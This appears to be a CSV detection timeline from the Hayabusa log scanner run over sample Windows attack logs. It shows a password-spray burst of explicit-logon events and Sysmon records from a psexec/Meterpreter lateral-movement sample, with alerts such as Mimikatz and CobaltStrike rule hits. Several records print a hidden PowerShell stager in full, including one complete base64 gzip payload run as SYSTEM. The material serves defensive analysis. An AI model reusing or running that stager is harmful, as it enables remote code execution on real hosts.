DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:drook/bgalbraith/edygert/jorchilles/bking/jlake/mdouglas/cspizor/bgreenwood/smisenar/ssims/cragoso/dmashburn/baker IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- +2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP 
Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 
172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 05:26:51.793 +09:00,IEWIN7,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,Exec,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object 
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3348 | PGUID: 365ABB72-AF8B-5CC8-0000-00101C1A1900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent 
Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Exec | C2,Curl Start Combination,,rules/sigma/process_creation/proc_creation_win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,info,,Process Created,"Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 3872 | PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell 
Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Dia
gnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.371 +09:00,IEWIN7,10,low,,Process Access,Src Process: 50\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3872 | Src PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900 | Tgt PID: 2484 | Tgt PGUID: 
365ABB72-AF8C-5CC8-0000-001003361900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:53.152 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:33801 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:54.152 